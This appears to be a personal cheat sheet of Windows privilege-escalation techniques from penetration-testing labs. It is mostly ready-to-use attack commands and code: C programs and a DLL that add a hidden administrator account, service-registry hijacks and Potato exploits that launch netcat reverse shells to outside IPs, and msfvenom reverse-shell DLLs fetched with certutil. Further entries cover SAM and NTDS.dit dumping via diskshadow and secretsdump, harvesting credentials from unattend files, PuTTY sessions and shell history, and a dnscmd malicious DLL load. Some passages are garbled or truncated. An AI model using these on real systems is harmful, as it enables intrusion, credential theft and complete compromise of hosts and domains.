(Get-PSReadlineOption).HistorySavePath
ls C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
#looping in each history user
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Get-Service
wmic service get DisplayName, State, StartMode
Get-WmiObject -Class Win32_Service
cmd.exe /c sc queryex state=all type=service
PowerShell history path
ls C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
enumerate schtask exe file
schtasks /query /fo LIST /v | Select-String -Pattern "\.exe"
enumerate enabled local users
Get-LocalUser
Name Enabled Description
---- ------- -----------
Administrator False Built-in account for administering the computer/domain
DefaultAccount False A user account managed by the system.
Guest False Built-in account for guest access to the computer/domain
nelly True
offsec True
WDAGUtilityAccount False A user account managed and used by the system for Windows Defender Application Guard scen...
...
#Checking these files, they may contain the administrator password in plain text or base64 encoding
C:\\Windows\Panther\Unattend\Unattended.xml
C:\\Windows\Panther\Unattdended.xml
C:\\Windows\system32\sysprep\sysprep.xml
C:\\Windows\system32\sysprep.inf
C:\xampp\tomcat\conf\tomcat-users.xml
#sam and system files in backups
C:\Windows\Sytem32\config
C:\Windows\Sytem32\config\RegBack
C:\Windows\RegBack
passwords.txt file contain password for mysql,webdav,FileZilla ftp,...
C:\xampp> type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
wmic service get name,displayname,pathname,startmod
determine privileges over a server
PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Users:(RX)
NT AUTHORITY\Authenticated Users:(RX)
Successfully processed 1 files; Failed processing 0 files
#check which user are running this service
sc qc test
creating script with c to add new user in admin localgroup
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
return 0;
}
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
#enumerate service to see wich user privilege are runnning
sc qc regsvc
#check registry keys permission
C:\test\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
=> if we we found KEY_ALL_ACESS in a group we joined we can abuse it
set the path of server shell exe in the key register value
$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}
#search for all services with local system privileges
$services = Get-ItemProperty -Path HKLM:\System\CurrentContrlSet\Services\
$services | where {($_.ObjectName -match ‘LocalSystem’)}
#check also strated property of those that can stra manually
$services | Where-Object {($_.ObjectName -eq "LocalSystem") **-and ($_.Start -eq 3)}
#no we want seach for service that we can strat so we will use sc to get us that and sdshadow to display security discriptors (DACLs) for all services
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\* $services_tmp = $services | Where-Object {($_.ObjectName -eq "LocalSystem") -and ($_.Start -eq 3)} $service_names = $services_tmp.pschildnameforeach ($name in $service_names){
$sddl = sc.exe sdshow $service_names -match "RP[A-Z]*?;;;AU"{
$service_names
}
}
#confirming strat type is 3 and localsystem priv
sc.exe qc wuauserv
#we can modify now ImagePath of the service by changing its value to an executable we own
Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\wuauserv -name ImagePath -value "C:\windows\system32\spool\drivers\color\nc.exe -e powershell.exe 10.10.14.26 4447"
#strat the service
sc.exe start wuauserv
Below are the Start Property values and their description.
The SDDL permissions for start service is RP and stop WP
and now we need to reboot the machine, in windows when restarting the machine the service will run with permission of the last user logging.
AlwaysElevatedPrivileges
The “Always Elevated Privileges” vulnerability occurs in Windows Installer packages (.msi) that have been designed to run with administrative privileges by default.
#check if the valued set is 0x1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
if the value is 0x1 that means is enabled and it's contain a user creds so keep in mind we can use sekulsa::logonpasswords to retrieve it if we are admin local or there is a service or a process that is running with these creds.
Putty
#Check the values saved in each session, user/password could be there
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername"
#query the sesion found from previous command to display creds
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
#dump SAM & System
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
C:\Windows write permissions
we can hijack any dlls in this example we will use systeminfo’s tzres.dll
Create another reverse shell outputting the file as tzres.dll and transfer it to the victim; placing it in the c:\windows\system32\wbem directory.
hijacking systeminfo dll
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll
certuitl -f -urlcache http://IP C:\windows\System32\wbem\tzres.dll
#trigger the malicious dll to get a reverseshell
systeminfo
Scheduled Tasks
list all scheduled tasks
PS C:\Users\steve> schtasks /query /fo LIST /v
...
Folder: \Microsoft
HostName: CLIENTWK220
TaskName: \Microsoft\CacheCleanup
Next Run Time: 7/11/2022 2:47:21 AM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 7/11/2022 2:46:22 AM
Last Result: 0
Author: CLIENTWK220\daveadmin
Task To Run: C:\Users\steve\Pictures\BackendCacheCleanup.exe
Start In: C:\Users\steve\Pictures
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: daveadmin
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 7:37:21 AM
Start Date: 7/4/2022
...
#check this files
c:\WINDOWS\SchedLgU.Txt
#another powershell command
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
check permessions
PS C:\Users\steve> icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
C:\Users\steve\Pictures\BackendCacheCleanup.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
CLIENTWK220\steve:(I)(F)
CLIENTWK220\offsec:(I)(F)
.\PrintSpoofer64.exe -i -c powershell.exe
.\PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
nt authority\system
=> will not work if spooler disabled in the machine
GodPotato.exe -cmd "cmd /c whoami"
#set a new password for administrator but pay attention to the old admin password you may need it later to pivote...
GodPotato.exe -cmd "cmd /c net user Administrator Password123"
#executing a revershell
GodPotato.exe -cmd "c:\TMP\shell.exe"
5-SweetPotato
SweetPotato.exe -a whoami
.\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd"
=>will not work if spooler server id disabled
6-JuicyPotato
x86
.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c whoami" -t *
Then -p to choose the program to launch with elevated privileges. Be sure to use the full path. Any arguments for the program are passed with -a and placed in quotes, followed by -t * to create the process token.
in case of failed
The default CLSID did not work, so we will hunt for a new one. It will -c argument :
Automate process to find valid CLSID as system authority user
create a file named test_clsid.bat
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (CLSID.list) DO (
echo %%i !port!
juicypotato.exe -z -l !port! -c %%i >> result.log
set RET=!ERRORLEVEL!
:: echo !RET!
if "!RET!" == "1" set /a port=port+1
)
create a file CLSID.list
put clsid list from "https://github.com/ohpe/juicy-potato/tree/master/CLSID"
run the bat file
and than use a CLSID with NT Authority\System
SeBackupPrivilege
1-RegSave.exe
.\RegSave.exe -t DC01 -o "C:\Users\svc_backup\Documents" --backup
[+] Exported \\DC01\HKLM\SAM to C:\Users\svc_backup\Documents\3BEF2064-A1DA-422E-B5D8-0086D1FB82E4
[+] Exported \\DC01\HKLM\SYSTEM to C:\Users\svc_backup\Documents\B8519DCB-2E82-4D28-AAD4-CF5428193033
[+] Exported \\DC01\HKLM\SECURITY to C:\Users\svc_backup\Documents\D4818E3E-7A32-4876-B9B7-1B9236317F27
2-SAM via registry
reg save hklm\system system
reg save hklm\sam sam
3-NTDSUtil
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
4-diskshadow
create a script and encode it
$ cat kunal.dsh
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:
#encode
$ unix2dos kunal.dsh
unix2dos: converting file kunal.dsh to DOS format...
#or we can encode it in powershell directly
Get-Content -path kunal.dsh | set-content -path kunal.script -encoding ascii
diskshadow /s kunal.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 10/23/2023 3:11:30 PM
-> set context persistent nowriters
-> add volume c: alias kunal
-> create
Alias kunal for shadow ID {69873b2c-c8cc-47c4-87f6-530b086b0eed} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {825b3882-58fd-45ec-82b4-d41c20790e90} set as environment variable.
Querying all shadow copies with the shadow copy set ID {825b3882-58fd-45ec-82b4-d41c20790e90}
* Shadow copy ID = {69873b2c-c8cc-47c4-87f6-530b086b0eed} %kunal%
- Shadow copy set: {825b3882-58fd-45ec-82b4-d41c20790e90} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 10/23/2023 3:11:30 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %kunal% z:
-> %kunal% = {69873b2c-c8cc-47c4-87f6-530b086b0eed}
The shadow copy was successfully exposed as z:\.
using robocopy to copy ntds
robocopy /B Z:\Windows\NTDS . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, October 23, 2023 3:16:12 PM
Source : Z:\Windows\NTDS\
Dest : C:\Temp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 Z:\Windows\NTDS\
New File 16.0 m ntds.dit
...
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 111,107,390 Bytes/sec.
Speed : 6,357.616 MegaBytes/min.
Ended : Monday, October 23, 2023 3:16:12 PM
The ntds was created in temp directory
PS C:\Temp> dir ntds.dit
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/23/2023 10:52 AM 16777216 ntds.dit
5-Wbadmin
first you need to set up and smb server using that support NTFS 1-configure samba server with authentication
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
interfaces = tun0
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
2-Create a new user that matches the user in the force user parameter
It is worth noting that the SeRestorePrivilege being enabled can pportunity in penetration testing or ethical hacking scenarios. This privilege is designed to permit a user to restore files and d more crucially, it enables the f file permissions and ACL checks. This can be utilized to substitute system files with other files, a common technique employed scalation or retaining access.
By replacing utilman.exe with cmd.exe, we can access the Command Prompt from the Windows login screen without needing to log in.
This means that if we reboot or logout from the machine and press Windows Key + U at the login screen, instead of opening the Utility Manager, the system will launch the Command Prompt with system privileges.
Now opening the rdp with rdesktop we can call the utilman.exe using windows + U
SeLoadDriverPrivilege
First we need to turn on the privilege of SeLoadDriverPrivilege that is disabled.
Upload it on Traget machine. Now execute the payload.
.\ExploitCapcom.exe EXPLOIT shell.exe
You gonna get reverse shell as SYSTEM.
SeManageVolumePrivilege
.\SeManageVolumeExploit.exe
#confirme we can write into c:\Windows\System32
echo "test" > C:\Windows\System32\test.txt
#so we can hijack and abuse anything we want
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll
copy tzres.dll C:\Windows\System32\wbem
systeminfo
SeTakeOwnershipPrivilege
enable it
PS C:\htb> Import-Module .\Enable-Privilege.ps1
PS C:\htb> .\EnableAllTokenPrivs.ps1
PS C:\htb> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ======================================== =======
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Let's check out our target file to gather a bit more information about it.
Now we can use the takeown Windows binary to change ownership of the file.
PS C:\htb> takeown /f 'C:\Department Shares\Private\IT\cred.txt'
SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\htb-student".
We can confirm ownership using the same command as before. We now see that our user account is the file owner.
#generate a dll with msfvenom
msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll
#strat smb server remotely to avoid trigger AV
sudo impacket-smbserver.py share ./
# dnscmd utility can be used to set the remote DLL path into the Windows Registry
cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.14.9\share\da.dll
#restart dns service
sc.exe stop dns
sc.exe start dns
#login as administrator
sudo psexec.py megabank.local/administrator@10.10.10.169
Local Service or Network Service Group
Normally since we now have access to the LOCAL SERVICE account, we should theoretically have the SeImpersonatePrivilege and SeAssignPrimaryToken privileges. This would grant us the ability to perform auth coercion to SYSTEM via a malicious named pipe. But sometimes if we did not have these privileges we can restore them by using FullPowers.exe tool . The key here the author notice when creating a scheduled task, the new process created by the Task Scheduler Service has all the default privileges of the associated user account (except SeImpersonate). Therefore, with some token manipulations, you can spawn a new process with all the missing privileges.
Checking if we have local service privileges
C:\xampp\htdocs>whoami
nt authority\local service
using fullPower.exe
#download file
iwr http://10.8.0.210/FullPowers.exe -outfile FullPowers.exe
#usage 1: spawn a new cmd as localsystem user
.\FullPowers.exe
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
#usage 2
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.0.210 443 -e cmd" -z
[+] Started dummy thread with id 3704
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
It is a very highly privileged group that can log in locally to servers, including Domain Controllers. Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.
git clone https://github.com/bitsadmin/wesng --depth 1
#i used this one
python /opt/wesng/wes.py ./systeminof.txt -i 'Elevation of Privilege' --exploits o
If we have gained command execution in the context of this user or can abuse DPAPI, then we can recover the cleartext credentials from encrypted.xml. The example below assumes the former.
The registry file found contains a Password attribute, with the corresponding value consisting of hexadecimal characters.
#support this is the password we found
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
#we need now to dectrypt it using metasploit
msfconsole
msf5 > irb key="\x17\x52\x6b\x06\x23\x4e\x58\x07"
require 'rex/proto/rfb'
Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), key
Decrypting PowerShell Credentials
If we have gained command execution in the context of this user or can abuse DPAPI, then we can recover the cleartext credentials from encrypted.xml. The example below assumes the former.
#usage: "mklink /J [directory we want to link should not exist] [destination]"
cmd /c "mklink /J C:\Users\upload C:\xampp\htdocs"
Spawn Shell as Administrator
Invoke-RunasCs -Username Administrator -Password trustno1 -Command ./shell.exe
#PsExec
.\PsExec64.exe -accepteula -i -s "c:\shell.exe"
#winexec in linux
winexe -U 'admin%Password123' //192.168.45.16 cmd.exe
#spawn shell as system
winexe -U 'admin%Password123' --system //192.168.45.16 cmd.exe
Insecure GUI Apps
check running process permissions
tasklist /V | findstr mspaint.exe
abuse app GUI by running cmd
open cmd here
Startup Apps
each user can define apps that start when they log in by placing shortcuts to the in specific directory Windows also has a startup directory for apps that should start for all users: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ if we create a file in this directory, we can use our revershell executable and escalate privileges when an admin login
using accesschck to check permission over this directory
